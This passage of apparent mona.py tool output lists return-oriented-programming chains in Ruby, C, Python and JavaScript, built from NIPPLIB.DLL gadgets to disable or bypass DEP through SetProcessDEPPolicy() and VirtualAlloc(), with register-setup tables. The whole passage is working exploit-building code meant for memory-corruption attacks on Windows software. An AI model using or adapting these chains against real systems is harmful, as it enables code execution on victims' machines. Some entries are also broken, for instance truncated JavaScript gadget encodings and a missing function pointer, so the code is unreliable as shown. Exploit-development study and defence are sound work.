    "%u0337%u5c08" + // 0x5c080337 : ,# NEG EAX # RETN [NIPPLIB.DLL] 
    "%u6ae2%u5c06" + // 0x5c066ae2 : ,# POP EDI # RETN [NIPPLIB.DLL] 
    "%u6ae2%u5c06" + // 0x5c066ae2 : ,# skip 4 bytes [NIPPLIB.DLL]
    "%u39e1%u5c08" + // 0x5c0839e1 : ,# PUSHAD # RETN [NIPPLIB.DLL] 
    ""); //  : 


--------------------------------------------------------------------------------------------------


################################################################################

Register setup for SetProcessDEPPolicy() :
--------------------------------------------
 EAX = <not used>
 ECX = <not used>
 EDX = <not used>
 EBX = dwFlags (ptr to 0x00000000)
 ESP = ReturnTo (automatic)
 EBP = ptr to SetProcessDEPPolicy()
 ESI = <not used>
 EDI = ROP NOP (4 byte stackpivot)
--------------------------------------------


ROP Chain for SetProcessDEPPolicy() [(XP SP3/Vista SP1/2008 Server SP1, can be called only once per process)] :
---------------------------------------------------------------------------------------------------------------

*** [ Ruby ] ***

  def create_rop_chain()

    # rop chain generated with mona.py - www.corelan.be
    rop_gadgets = 
    [
      0x00000000,  # [-] Unable to find ptr to SetProcessDEPPolicy() (-> to be put in ebp)
      0x5c064e3f,  # POP EBX # RETN [NIPPLIB.DLL] 
      0x5c128104,  # &0x00000000 [NIPPLIB.DLL]
      0x5c066ed3,  # POP EDI # RETN [NIPPLIB.DLL] 
      0x5c066ed3,  # skip 4 bytes [NIPPLIB.DLL]
      0x5c0839e1,  # PUSHAD # RETN [NIPPLIB.DLL] 
    ].flatten.pack("V*")

    return rop_gadgets

  end


  # Call the ROP chain generator inside the 'exploit' function :


  rop_chain = create_rop_chain()



*** [ C ] ***

  #define CREATE_ROP_CHAIN(name, ...) \
    int name##_length = create_rop_chain(NULL, ##__VA_ARGS__); \
    unsigned int name[name##_length / sizeof(unsigned int)]; \
    create_rop_chain(name, ##__VA_ARGS__);

  int create_rop_chain(unsigned int *buf, unsigned int )
  {
    // rop chain generated with mona.py - www.corelan.be
    unsigned int rop_gadgets[] = {
      0x00000000,  // [-] Unable to find ptr to SetProcessDEPPolicy() (-> to be put in ebp)
      0x5c064e3f,  // POP EBX // RETN [NIPPLIB.DLL] 
      0x5c128104,  // &0x00000000 [NIPPLIB.DLL]
      0x5c066ed3,  // POP EDI // RETN [NIPPLIB.DLL] 
      0x5c066ed3,  // skip 4 bytes [NIPPLIB.DLL]
      0x5c0839e1,  // PUSHAD // RETN [NIPPLIB.DLL] 
    };
    if(buf != NULL) {
      memcpy(buf, rop_gadgets, sizeof(rop_gadgets));
    };
    return sizeof(rop_gadgets);
  }

  // use the 'rop_chain' variable after this call, it's just an unsigned int[]
  CREATE_ROP_CHAIN(rop_chain, );
  // alternatively just allocate a large enough buffer and get the rop chain, i.e.:
  // unsigned int rop_chain[256];
  // int rop_chain_length = create_rop_chain(rop_chain, );

*** [ Python ] ***

  def create_rop_chain():

    # rop chain generated with mona.py - www.corelan.be
    rop_gadgets = [
      0x00000000,  # [-] Unable to find ptr to SetProcessDEPPolicy() (-> to be put in ebp)
      0x5c064e3f,  # POP EBX # RETN [NIPPLIB.DLL] 
      0x5c128104,  # &0x00000000 [NIPPLIB.DLL]
      0x5c066ed3,  # POP EDI # RETN [NIPPLIB.DLL] 
      0x5c066ed3,  # skip 4 bytes [NIPPLIB.DLL]
      0x5c0839e1,  # PUSHAD # RETN [NIPPLIB.DLL] 
    ]
    return ''.join(struct.pack('<I', _) for _ in rop_gadgets)

  rop_chain = create_rop_chain()



*** [ JavaScript ] ***

  //rop chain generated with mona.py - www.corelan.be
  rop_gadgets = unescape(
    "%u0000%u0000" + // 0x00000000 : ,# [-] Unable to find ptr to SetProcessDEPPolicy() (-> to be put in ebp)
    "%u4e3f%u5c06" + // 0x5c064e3f : ,# POP EBX # RETN [NIPPLIB.DLL] 
    "%u8104%u5c12" + // 0x5c128104 : ,# &0x00000000 [NIPPLIB.DLL]
    "%u6ed3%u5c06" + // 0x5c066ed3 : ,# POP EDI # RETN [NIPPLIB.DLL] 
    "%u6ed3%u5c06" + // 0x5c066ed3 : ,# skip 4 bytes [NIPPLIB.DLL]
    "%u39e1%u5c08" + // 0x5c0839e1 : ,# PUSHAD # RETN [NIPPLIB.DLL] 
    ""); //  : 


--------------------------------------------------------------------------------------------------


################################################################################

Register setup for VirtualAlloc() :
--------------------------------------------
 EAX = NOP (0x90909090)
 ECX = flProtect (0x40)
 EDX = flAllocationType (0x1000)
 EBX = dwSize
 ESP = lpAddress (automatic)
 EBP = ReturnTo (ptr to jmp esp)
 ESI = ptr to VirtualAlloc()
 EDI = ROP NOP (RETN)
 --- alternative chain ---
 EAX = ptr to &VirtualAlloc()
 ECX = flProtect (0x40)
 EDX = flAllocationType (0x1000)
 EBX = dwSize
 ESP = lpAddress (automatic)
 EBP = POP (skip 4 bytes)
 ESI = ptr to JMP [EAX]
 EDI = ROP NOP (RETN)
 + place ptr to "jmp esp" on stack, below PUSHAD
--------------------------------------------


ROP Chain for VirtualAlloc() [(XP/2003 Server and up)] :
--------------------------------------------------------

*** [ Ruby ] ***

  def create_rop_chain()

    # rop chain generated with mona.py - www.corelan.be
    rop_gadgets = 
    [
      0x5c077cfd,  # POP EBP # RETN [NIPPLIB.DLL] 
      0x5c077cfd,  # skip 4 bytes [NIPPLIB.DLL]
      0x5c06dc78,  # POP EAX # RETN [NIPPLIB.DLL] 
      0xffffffff,  # Value to negate, will become 0x00000001
      0x5c0abe26,  # NEG EAX # RETN [NIPPLIB.DLL] 
      0x5c08d949,  # XCHG EAX,EBX # RETN [NIPPLIB.DLL] 
      0x5c06dc78,  # POP EAX # RETN [NIPPLIB.DLL] 
      0xa13fdca1,  # put delta into eax (-> put 0x00001000 into edx)
      0x5c0ae76b,  # ADD EAX,5EC0335F # RETN [NIPPLIB.DLL] 
      0x5c06a72a,  # XCHG EAX,EDX # RETN 0x00 [NIPPLIB.DLL] 
      0x5c09fd76,  # POP ECX # RETN [NIPPLIB.DLL] 
      0xffffffff,  #  
      0x5c0bd4e2,  # INC ECX # RETN [NIPPLIB.DLL] 
      0x5c0bd5c2,  # INC ECX # RETN [NIPPLIB.DLL] 
      0x5c0bd5c2,  # INC ECX # RETN [NIPPLIB.DLL] 
      0x5c0bd5c2,  # INC ECX # RETN [NIPPLIB.DLL] 
      0x5c0bd5c2,  # INC ECX # RETN [NIPPLIB.DLL] 
      0x5c0bd5c2,  # INC ECX # RETN [NIPPLIB.DLL] 
      0x5c0bd5c2,  # INC ECX # RETN [NIPPLIB.DLL] 
      0x5c0bd5c2,  # INC ECX # RETN [NIPPLIB.DLL] 
      0x5c0bd5c2,  # INC ECX # RETN [NIPPLIB.DLL] 
      0x5c0bd5c2,  # INC ECX # RETN [NIPPLIB.DLL] 
      0x5c0bd5c2,  # INC ECX # RETN [NIPPLIB.DLL] 
      0x5c0bd5c2,  # INC ECX # RETN [NIPPLIB.DLL] 
      0x5c0bd5c2,  # INC ECX # RETN [NIPPLIB.DLL] 
      0x5c0bd5c2,  # INC ECX # RETN [NIPPLIB.DLL] 
      0x5c0bd5c2,  # INC ECX # RETN [NIPPLIB.DLL] 
      0x5c0bd5c2,  # INC ECX # RETN [NIPPLIB.DLL] 
      0x5c0bd5c2,  # INC ECX # RETN [NIPPLIB.DLL] 
      0x5c0bd5c2,  # INC ECX # RETN [NIPPLIB.DLL] 
      0x5c0bd5c2,  # INC ECX # RETN [NIPPLIB.DLL] 
      0x5c0bd5c2,  # INC ECX # RETN [NIPPLIB.DLL] 
      0x5c0bd5c2,  # INC ECX # RETN [NIPPLIB.DLL] 
      0x5c0bd5c2,  # INC ECX # RETN [NIPPLIB.DLL] 
      0x5c0bd5c2,  # INC ECX # RETN [NIPPLIB.DLL] 
      0x5c0bd5c2,  # INC ECX # RETN [NIPPLIB.DLL] 
      0x5c0bd5c2,  # INC ECX # RETN [NIPPLIB.DLL] 
      0x5c0bd5c2,  # INC ECX # RETN [NIPPLIB.DLL] 
      0x5c0bd5c2,  # INC ECX # RETN [NIPPLIB.DLL] 
      0x5c0bd5c2,  # INC ECX # RETN [NIPPLIB.DLL] 
      0x5c0bd5c2,  # INC ECX # RETN [NIPPLIB.DLL] 
      0x5c0bd5c2,  # INC ECX # RETN [NIPPLIB.DLL] 
      0x5c0bd5c2,  # INC ECX # RETN [NIPPLIB.DLL] 
      0x5c0bd5c2,  # INC ECX # RETN [NIPPLIB.DLL] 
      0x5c0bd5c2,  # INC ECX # RETN [NIPPLIB.DLL] 
      0x5c0bd5c2,  # INC ECX # RETN [NIPPLIB.DLL] 
      0x5c0bd5c2,  # INC ECX # RETN [NIPPLIB.DLL] 
      0x5c0bd5c2,  # INC ECX # RETN [NIPPLIB.DLL] 
      0x5c0bd5c2,  # INC ECX # RETN [NIPPLIB.DLL] 
      0x5c0bd5c2,  # INC ECX # RETN [NIPPLIB.DLL] 
      0x5c0bd5c2,  # INC ECX # RETN [NIPPLIB.DLL] 
      0x5c0bd5c2,  # INC ECX # RETN [NIPPLIB.DLL] 
      0x5c0bd5c2,  # INC ECX # RETN [NIPPLIB.DLL] 
      0x5c0bd5c2,  # INC ECX # RETN [NIPPLIB.DLL] 
      0x5c0bd5c2,  # INC ECX # RETN [NIPPLIB.DLL] 
      0x5c0bd5c2,  # INC ECX # RETN [NIPPLIB.DLL] 
      0x5c0bd5c2,  # INC ECX # RETN [NIPPLIB.DLL] 
      0x5c0bd5c2,  # INC ECX # RETN [NIPPLIB.DLL] 
      0x5c0bd5c2,  # INC ECX # RETN [NIPPLIB.DLL] 
      0x5c0bd5c2,  # INC ECX # RETN [NIPPLIB.DLL] 
      0x5c0bd5c2,  # INC ECX # RETN [NIPPLIB.DLL] 
      0x5c0bd5c2,  # INC ECX # RETN [NIPPLIB.DLL] 
      0x5c0bd5c2,  # INC ECX # RETN [NIPPLIB.DLL] 
      0x5c0bd5c2,  # INC ECX # RETN [NIPPLIB.DLL] 
      0x5c0bd5c2,  # INC ECX # RETN [NIPPLIB.DLL] 
      0x5c0bd5c2,  # INC ECX # RETN [NIPPLIB.DLL] 
      0x5c0bd5c2,  # INC ECX # RETN [NIPPLIB.DLL] 
      0x5c0bd5c2,  # INC ECX # RETN [NIPPLIB.DLL] 
      0x5c0bd5c2,  # INC ECX # RETN [NIPPLIB.DLL] 
      0x5c0bd5c2,  # INC ECX # RETN [NIPPLIB.DLL] 
      0x5c0bd5c2,  # INC ECX # RETN [NIPPLIB.DLL] 
      0x5c0bd5c2,  # INC ECX # RETN [NIPPLIB.DLL] 
      0x5c0bd5c2,  # INC ECX # RETN [NIPPLIB.DLL] 
      0x5c0bd5c2,  # INC ECX # RETN [NIPPLIB.DLL] 
      0x5c0bd5c2,  # INC ECX # RETN [NIPPLIB.DLL] 
      0x5c0bd5c2,  # INC ECX # RETN [NIPPLIB.DLL] 
      0x5c0bd5c2,  # INC ECX # RETN [NIPPLIB.DLL] 
      0x5c07681e,  # POP EDI # RETN [NIPPLIB.DLL] 
      0x5c075142,  # RETN (ROP NOP) [NIPPLIB.DLL]
      0x5c07acc7,  # POP ESI # RETN [NIPPLIB.DLL] 
      0x5c01bbc0,  # JMP [EAX] [NIPPLIB.DLL]
      0x5c06dc78,  # POP EAX # RETN [NIPPLIB.DLL] 
      0x63581314,  # ptr to &VirtualAlloc() (skipped module criteria, check if pointer is reliable !) [IAT mshtml.dll]
      0x5c0839e1,  # PUSHAD # RETN [NIPPLIB.DLL] 
      0x5c071ba0,  # ptr to 'push esp # ret ' [NIPPLIB.DLL]
    ].flatten.pack("V*")

    return rop_gadgets

  end


  # Call the ROP chain generator inside the 'exploit' function :


  rop_chain = create_rop_chain()



*** [ C ] ***

  #define CREATE_ROP_CHAIN(name, ...) \
    int name##_length = create_rop_chain(NULL, ##__VA_ARGS__); \
    unsigned int name[name##_length / sizeof(unsigned int)]; \
    create_rop_chain(name, ##__VA_ARGS__);

  int create_rop_chain(unsigned int *buf, unsigned int )
  {
    // rop chain generated with mona.py - www.corelan.be
    unsigned int rop_gadgets[] = {
      0x5c077cfd,  // POP EBP // RETN [NIPPLIB.DLL] 
      0x5c077cfd,  // skip 4 bytes [NIPPLIB.DLL]
      0x5c06dc78,  // POP EAX // RETN [NIPPLIB.DLL] 
      0xffffffff,  // Value to negate, will become 0x00000001
      0x5c0abe26,  // NEG EAX // RETN [NIPPLIB.DLL] 
      0x5c08d949,  // XCHG EAX,EBX // RETN [NIPPLIB.DLL] 
      0x5c06dc78,  // POP EAX // RETN [NIPPLIB.DLL] 
      0xa13fdca1,  // put delta into eax (-> put 0x00001000 into edx)
      0x5c0ae76b,  // ADD EAX,5EC0335F // RETN [NIPPLIB.DLL] 
      0x5c06a72a,  // XCHG EAX,EDX // RETN 0x00 [NIPPLIB.DLL] 
      0x5c09fd76,  // POP ECX // RETN [NIPPLIB.DLL] 
      0xffffffff,  //  
      0x5c0bd4e2,  // INC ECX // RETN [NIPPLIB.DLL] 
      0x5c0bd5c2,  // INC ECX // RETN [NIPPLIB.DLL] 
      0x5c0bd5c2,  // INC ECX // RETN [NIPPLIB.DLL] 
      0x5c0bd5c2,  // INC ECX // RETN [NIPPLIB.DLL] 
      0x5c0bd5c2,  // INC ECX // RETN [NIPPLIB.DLL] 
      0x5c0bd5c2,  // INC ECX // RETN [NIPPLIB.DLL] 
      0x5c0bd5c2,  // INC ECX // RETN [NIPPLIB.DLL] 
      0x5c0bd5c2,  // INC ECX // RETN [NIPPLIB.DLL] 
      0x5c0bd5c2,  // INC ECX // RETN [NIPPLIB.DLL] 
      0x5c0bd5c2,  // INC ECX // RETN [NIPPLIB.DLL] 
      0x5c0bd5c2,  // INC ECX // RETN [NIPPLIB.DLL] 
      0x5c0bd5c2,  // INC ECX // RETN [NIPPLIB.DLL] 
      0x5c0bd5c2,  // INC ECX // RETN [NIPPLIB.DLL] 
      0x5c0bd5c2,  // INC ECX // RETN [NIPPLIB.DLL] 
      0x5c0bd5c2,  // INC ECX // RETN [NIPPLIB.DLL] 
      0x5c0bd5c2,  // INC ECX // RETN [NIPPLIB.DLL] 
      0x5c0bd5c2,  // INC ECX // RETN [NIPPLIB.DLL] 
      0x5c0bd5c2,  // INC ECX // RETN [NIPPLIB.DLL] 
      0x5c0bd5c2,  // INC ECX // RETN [NIPPLIB.DLL] 
      0x5c0bd5c2,  // INC ECX // RETN [NIPPLIB.DLL] 
      0x5c0bd5c2,  // INC ECX // RETN [NIPPLIB.DLL] 
      0x5c0bd5c2,  // INC ECX // RETN [NIPPLIB.DLL] 
      0x5c0bd5c2,  // INC ECX // RETN [NIPPLIB.DLL] 
      0x5c0bd5c2,  // INC ECX // RETN [NIPPLIB.DLL] 
      0x5c0bd5c2,  // INC ECX // RETN [NIPPLIB.DLL] 
      0x5c0bd5c2,  // INC ECX // RETN [NIPPLIB.DLL] 
      0x5c0bd5c2,  // INC ECX // RETN [NIPPLIB.DLL] 
      0x5c0bd5c2,  // INC ECX // RETN [NIPPLIB.DLL] 
      0x5c0bd5c2,  // INC ECX // RETN [NIPPLIB.DLL] 
      0x5c0bd5c2,  // INC ECX // RETN [NIPPLIB.DLL] 
      0x5c0bd5c2,  // INC ECX // RETN [NIPPLIB.DLL] 
      0x5c0bd5c2,  // INC ECX // RETN [NIPPLIB.DLL] 
      0x5c0bd5c2,  // INC ECX // RETN [NIPPLIB.DLL] 
      0x5c0bd5c2,  // INC ECX // RETN [NIPPLIB.DLL] 
      0x5c0bd5c2,  // INC ECX // RETN [NIPPLIB.DLL] 
      0x5c0bd5c2,  // INC ECX // RETN [NIPPLIB.DLL] 
      0x5c0bd5c2,  // INC ECX // RETN [NIPPLIB.DLL] 
      0x5c0bd5c2,  // INC ECX // RETN [NIPPLIB.DLL] 
      0x5c0bd5c2,  // INC ECX // RETN [NIPPLIB.DLL] 
      0x5c0bd5c2,  // INC ECX // RETN [NIPPLIB.DLL] 
      0x5c0bd5c2,  // INC ECX // RETN [NIPPLIB.DLL] 
      0x5c0bd5c2,  // INC ECX // RETN [NIPPLIB.DLL] 
      0x5c0bd5c2,  // INC ECX // RETN [NIPPLIB.DLL] 
      0x5c0bd5c2,  // INC ECX // RETN [NIPPLIB.DLL] 
      0x5c0bd5c2,  // INC ECX // RETN [NIPPLIB.DLL] 
      0x5c0bd5c2,  // INC ECX // RETN [NIPPLIB.DLL] 
      0x5c0bd5c2,  // INC ECX // RETN [NIPPLIB.DLL] 
      0x5c0bd5c2,  // INC ECX // RETN [NIPPLIB.DLL] 
      0x5c0bd5c2,  // INC ECX // RETN [NIPPLIB.DLL] 
      0x5c0bd5c2,  // INC ECX // RETN [NIPPLIB.DLL] 
      0x5c0bd5c2,  // INC ECX // RETN [NIPPLIB.DLL] 
      0x5c0bd5c2,  // INC ECX // RETN [NIPPLIB.DLL] 
      0x5c0bd5c2,  // INC ECX // RETN [NIPPLIB.DLL] 
      0x5c0bd5c2,  // INC ECX // RETN [NIPPLIB.DLL] 
      0x5c0bd5c2,  // INC ECX // RETN [NIPPLIB.DLL] 
      0x5c0bd5c2,  // INC ECX // RETN [NIPPLIB.DLL] 
      0x5c0bd5c2,  // INC ECX // RETN [NIPPLIB.DLL] 
      0x5c0bd5c2,  // INC ECX // RETN [NIPPLIB.DLL] 
      0x5c0bd5c2,  // INC ECX // RETN [NIPPLIB.DLL] 
      0x5c0bd5c2,  // INC ECX // RETN [NIPPLIB.DLL] 
      0x5c0bd5c2,  // INC ECX // RETN [NIPPLIB.DLL] 
      0x5c0bd5c2,  // INC ECX // RETN [NIPPLIB.DLL] 
      0x5c0bd5c2,  // INC ECX // RETN [NIPPLIB.DLL] 
      0x5c0bd5c2,  // INC ECX // RETN [NIPPLIB.DLL] 
      0x5c0bd5c2,  // INC ECX // RETN [NIPPLIB.DLL] 
      0x5c07681e,  // POP EDI // RETN [NIPPLIB.DLL] 
      0x5c075142,  // RETN (ROP NOP) [NIPPLIB.DLL]
      0x5c07acc7,  // POP ESI // RETN [NIPPLIB.DLL] 
      0x5c01bbc0,  // JMP [EAX] [NIPPLIB.DLL]
      0x5c06dc78,  // POP EAX // RETN [NIPPLIB.DLL] 
      0x63581314,  // ptr to &VirtualAlloc() (skipped module criteria, check if pointer is reliable !) [IAT mshtml.dll]
      0x5c0839e1,  // PUSHAD // RETN [NIPPLIB.DLL] 
      0x5c071ba0,  // ptr to 'push esp // ret ' [NIPPLIB.DLL]
    };
    if(buf != NULL) {
      memcpy(buf, rop_gadgets, sizeof(rop_gadgets));
    };
    return sizeof(rop_gadgets);
  }

  // use the 'rop_chain' variable after this call, it's just an unsigned int[]
  CREATE_ROP_CHAIN(rop_chain, );
  // alternatively just allocate a large enough buffer and get the rop chain, i.e.:
  // unsigned int rop_chain[256];
  // int rop_chain_length = create_rop_chain(rop_chain, );

*** [ Python ] ***

  def create_rop_chain():

    # rop chain generated with mona.py - www.corelan.be
    rop_gadgets = [
      0x5c077cfd,  # POP EBP # RETN [NIPPLIB.DLL] 
      0x5c077cfd,  # skip 4 bytes [NIPPLIB.DLL]
      0x5c06dc78,  # POP EAX # RETN [NIPPLIB.DLL] 
      0xffffffff,  # Value to negate, will become 0x00000001
      0x5c0abe26,  # NEG EAX # RETN [NIPPLIB.DLL] 
      0x5c08d949,  # XCHG EAX,EBX # RETN [NIPPLIB.DLL] 
      0x5c06dc78,  # POP EAX # RETN [NIPPLIB.DLL] 
      0xa13fdca1,  # put delta into eax (-> put 0x00001000 into edx)
      0x5c0ae76b,  # ADD EAX,5EC0335F # RETN [NIPPLIB.DLL] 
      0x5c06a72a,  # XCHG EAX,EDX # RETN 0x00 [NIPPLIB.DLL] 
      0x5c09fd76,  # POP ECX # RETN [NIPPLIB.DLL] 
      0xffffffff,  #  
      0x5c0bd4e2,  # INC ECX # RETN [NIPPLIB.DLL] 
      0x5c0bd5c2,  # INC ECX # RETN [NIPPLIB.DLL] 
      0x5c0bd5c2,  # INC ECX # RETN [NIPPLIB.DLL] 
      0x5c0bd5c2,  # INC ECX # RETN [NIPPLIB.DLL] 
      0x5c0bd5c2,  # INC ECX # RETN [NIPPLIB.DLL] 
      0x5c0bd5c2,  # INC ECX # RETN [NIPPLIB.DLL] 
      0x5c0bd5c2,  # INC ECX # RETN [NIPPLIB.DLL] 
      0x5c0bd5c2,  # INC ECX # RETN [NIPPLIB.DLL] 
      0x5c0bd5c2,  # INC ECX # RETN [NIPPLIB.DLL] 
      0x5c0bd5c2,  # INC ECX # RETN [NIPPLIB.DLL] 
      0x5c0bd5c2,  # INC ECX # RETN [NIPPLIB.DLL] 
      0x5c0bd5c2,  # INC ECX # RETN [NIPPLIB.DLL] 
      0x5c0bd5c2,  # INC ECX # RETN [NIPPLIB.DLL] 
      0x5c0bd5c2,  # INC ECX # RETN [NIPPLIB.DLL] 
      0x5c0bd5c2,  # INC ECX # RETN [NIPPLIB.DLL] 
      0x5c0bd5c2,  # INC ECX # RETN [NIPPLIB.DLL] 
      0x5c0bd5c2,  # INC ECX # RETN [NIPPLIB.DLL] 
      0x5c0bd5c2,  # INC ECX # RETN [NIPPLIB.DLL] 
      0x5c0bd5c2,  # INC ECX # RETN [NIPPLIB.DLL] 
      0x5c0bd5c2,  # INC ECX # RETN [NIPPLIB.DLL] 
      0x5c0bd5c2,  # INC ECX # RETN [NIPPLIB.DLL] 
      0x5c0bd5c2,  # INC ECX # RETN [NIPPLIB.DLL] 
      0x5c0bd5c2,  # INC ECX # RETN [NIPPLIB.DLL] 
      0x5c0bd5c2,  # INC ECX # RETN [NIPPLIB.DLL] 
      0x5c0bd5c2,  # INC ECX # RETN [NIPPLIB.DLL] 
      0x5c0bd5c2,  # INC ECX # RETN [NIPPLIB.DLL] 
      0x5c0bd5c2,  # INC ECX # RETN [NIPPLIB.DLL] 
      0x5c0bd5c2,  # INC ECX # RETN [NIPPLIB.DLL] 
      0x5c0bd5c2,  # INC ECX # RETN [NIPPLIB.DLL] 
      0x5c0bd5c2,  # INC ECX # RETN [NIPPLIB.DLL] 
      0x5c0bd5c2,  # INC ECX # RETN [NIPPLIB.DLL] 
      0x5c0bd5c2,  # INC ECX # RETN [NIPPLIB.DLL] 
      0x5c0bd5c2,  # INC ECX # RETN [NIPPLIB.DLL] 
      0x5c0bd5c2,  # INC ECX # RETN [NIPPLIB.DLL] 
      0x5c0bd5c2,  # INC ECX # RETN [NIPPLIB.DLL] 
      0x5c0bd5c2,  # INC ECX # RETN [NIPPLIB.DLL] 
      0x5c0bd5c2,  # INC ECX # RETN [NIPPLIB.DLL] 
      0x5c0bd5c2,  # INC ECX # RETN [NIPPLIB.DLL] 
      0x5c0bd5c2,  # INC ECX # RETN [NIPPLIB.DLL] 
      0x5c0bd5c2,  # INC ECX # RETN [NIPPLIB.DLL] 
      0x5c0bd5c2,  # INC ECX # RETN [NIPPLIB.DLL] 
      0x5c0bd5c2,  # INC ECX # RETN [NIPPLIB.DLL] 
      0x5c0bd5c2,  # INC ECX # RETN [NIPPLIB.DLL] 
      0x5c0bd5c2,  # INC ECX # RETN [NIPPLIB.DLL] 
      0x5c0bd5c2,  # INC ECX # RETN [NIPPLIB.DLL] 
      0x5c0bd5c2,  # INC ECX # RETN [NIPPLIB.DLL] 
      0x5c0bd5c2,  # INC ECX # RETN [NIPPLIB.DLL] 
      0x5c0bd5c2,  # INC ECX # RETN [NIPPLIB.DLL] 
      0x5c0bd5c2,  # INC ECX # RETN [NIPPLIB.DLL] 
      0x5c0bd5c2,  # INC ECX # RETN [NIPPLIB.DLL] 
      0x5c0bd5c2,  # INC ECX # RETN [NIPPLIB.DLL] 
      0x5c0bd5c2,  # INC ECX # RETN [NIPPLIB.DLL] 
      0x5c0bd5c2,  # INC ECX # RETN [NIPPLIB.DLL] 
      0x5c0bd5c2,  # INC ECX # RETN [NIPPLIB.DLL] 
      0x5c0bd5c2,  # INC ECX # RETN [NIPPLIB.DLL] 
      0x5c0bd5c2,  # INC ECX # RETN [NIPPLIB.DLL] 
      0x5c0bd5c2,  # INC ECX # RETN [NIPPLIB.DLL] 
      0x5c0bd5c2,  # INC ECX # RETN [NIPPLIB.DLL] 
      0x5c0bd5c2,  # INC ECX # RETN [NIPPLIB.DLL] 
      0x5c0bd5c2,  # INC ECX # RETN [NIPPLIB.DLL] 
      0x5c0bd5c2,  # INC ECX # RETN [NIPPLIB.DLL] 
      0x5c0bd5c2,  # INC ECX # RETN [NIPPLIB.DLL] 
      0x5c0bd5c2,  # INC ECX # RETN [NIPPLIB.DLL] 
      0x5c0bd5c2,  # INC ECX # RETN [NIPPLIB.DLL] 
      0x5c0bd5c2,  # INC ECX # RETN [NIPPLIB.DLL] 
      0x5c07681e,  # POP EDI # RETN [NIPPLIB.DLL] 
      0x5c075142,  # RETN (ROP NOP) [NIPPLIB.DLL]
      0x5c07acc7,  # POP ESI # RETN [NIPPLIB.DLL] 
      0x5c01bbc0,  # JMP [EAX] [NIPPLIB.DLL]
      0x5c06dc78,  # POP EAX # RETN [NIPPLIB.DLL] 
      0x63581314,  # ptr to &VirtualAlloc() (skipped module criteria, check if pointer is reliable !) [IAT mshtml.dll]
      0x5c0839e1,  # PUSHAD # RETN [NIPPLIB.DLL] 
      0x5c071ba0,  # ptr to 'push esp # ret ' [NIPPLIB.DLL]
    ]
    return ''.join(struct.pack('<I', _) for _ in rop_gadgets)

  rop_chain = create_rop_chain()



*** [ JavaScript ] ***

  //rop chain generated with mona.py - www.corelan.be
  rop_gadgets = unescape(
    "%u7cfd%u5c07" + // 0x5c077cfd : ,# POP EBP # RETN [NIPPLIB.DLL] 
    "%u7cfd%u5c07" + // 0x5c077cfd : ,# skip 4 bytes [NIPPLIB.DLL]
    "%udc78%u5c06" + // 0x5c06dc78 : ,# POP EAX # RETN [NIPPLIB.DLL] 
    "%uffff%uffff" + // 0xffffffff : ,# Value to negate, will become 0x00000001
    "%ube26" + // 0x5c0abe26 : ,# NEG EAX # RETN [NIPPLIB.DLL] 
    "%ud949%u5c08" + // 0x5c08d949 : ,# XCHG EAX,EBX # RETN [NIPPLIB.DLL] 
    "%udc78%u5c06" + // 0x5c06dc78 : ,# POP EAX # RETN [NIPPLIB.DLL] 
    "%udca1%ua13f" + // 0xa13fdca1 : ,# put delta into eax (-> put 0x00001000 into edx)
    "%ue76b" + // 0x5c0ae76b : ,# ADD EAX,5EC0335F # RETN [NIPPLIB.DLL] 
    "%ua72a%u5c06" + // 0x5c06a72a : ,# XCHG EAX,EDX # RETN 0x00 [NIPPLIB.DLL] 
    "%ufd76%u5c09" + // 0x5c09fd76 : ,# POP ECX # RETN [NIPPLIB.DLL] 
    "%uffff%uffff" + // 0xffffffff : ,#
    "%ud4e2%u5c0b" + // 0x5c0bd4e2 : ,# INC ECX # RETN [NIPPLIB.DLL] 
    "%ud5c2%u5c0b" + // 0x5c0bd5c2 : ,# INC ECX # RETN [NIPPLIB.DLL] 
    "%ud5c2%u5c0b" + // 0x5c0bd5c2 : ,# INC ECX # RETN [NIPPLIB.DLL] 
    "%ud5c2%u5c0b" + // 0x5c0bd5c2 : ,# INC ECX # RETN [NIPPLIB.DLL] 
    "%ud5c2%u5c0b" + // 0x5c0bd5c2 : ,# INC ECX # RETN [NIPPLIB.DLL] 
    "%ud5c2%u5c0b" + // 0x5c0bd5c2 : ,# INC ECX # RETN [NIPPLIB.DLL] 
    "%ud5c2%u5c0b" + // 0x5c0bd5c2 : ,# INC ECX # RETN [NIPPLIB.DLL] 
    "%ud5c2%u5c0b" + // 0x5c0bd5c2 : ,# INC ECX # RETN [NIPPLIB.DLL] 
    "%ud5c2%u5c0b" + // 0x5c0bd5c2 : ,# INC ECX # RETN [NIPPLIB.DLL] 
    "%ud5c2%u5c0b" + // 0x5c0bd5c2 : ,# INC ECX # RETN [NIPPLIB.DLL] 
    "%ud5c2%u5c0b" + // 0x5c0bd5c2 : ,# INC ECX # RETN [NIPPLIB.DLL] 
    "%ud5c2%u5c0b" + // 0x5c0bd5c2 : ,# INC ECX # RETN [NIPPLIB.DLL] 
    "%ud5c2%u5c0b" + // 0x5c0bd5c2 : ,# INC ECX # RETN [NIPPLIB.DLL] 
    "%ud5c2%u5c0b" + // 0x5c0bd5c2 : ,# INC ECX # RETN [NIPPLIB.DLL] 
    "%ud5c2%u5c0b" + // 0x5c0bd5c2 : ,# INC ECX # RETN [NIPPLIB.DLL] 
    "%ud5c2%u5c0b" + // 0x5c0bd5c2 : ,# INC ECX # RETN [NIPPLIB.DLL] 
    "%ud5c2%u5c0b" + // 0x5c0bd5c2 : ,# INC ECX # RETN [NIPPLIB.DLL] 
    "%ud5c2%u5c0b" + // 0x5c0bd5c2 : ,# INC ECX # RETN [NIPPLIB.DLL] 
    "%ud5c2%u5c0b" + // 0x5c0bd5c2 : ,# INC ECX # RETN [NIPPLIB.DLL] 
    "%ud5c2%u5c0b" + // 0x5c0bd5c2 : ,# INC ECX # RETN [NIPPLIB.DLL] 
    "%ud5c2%u5c0b" + // 0x5c0bd5c2 : ,# INC ECX # RETN [NIPPLIB.DLL] 
    "%ud5c2%u5c0b" + // 0x5c0bd5c2 : ,# INC ECX # RETN [NIPPLIB.DLL] 
    "%ud5c2%u5c0b" + // 0x5c0bd5c2 : ,# INC ECX # RETN [NIPPLIB.DLL] 
    "%ud5c2%u5c0b" + // 0x5c0bd5c2 : ,# INC ECX # RETN [NIPPLIB.DLL] 
    "%ud5c2%u5c0b" + // 0x5c0bd5c2 : ,# INC ECX # RETN [NIPPLIB.DLL] 
    "%ud5c2%u5c0b" + // 0x5c0bd5c2 : ,# INC ECX # RETN [NIPPLIB.DLL] 
    "%ud5c2%u5c0b" + // 0x5c0bd5c2 : ,# INC ECX # RETN [NIPPLIB.DLL] 
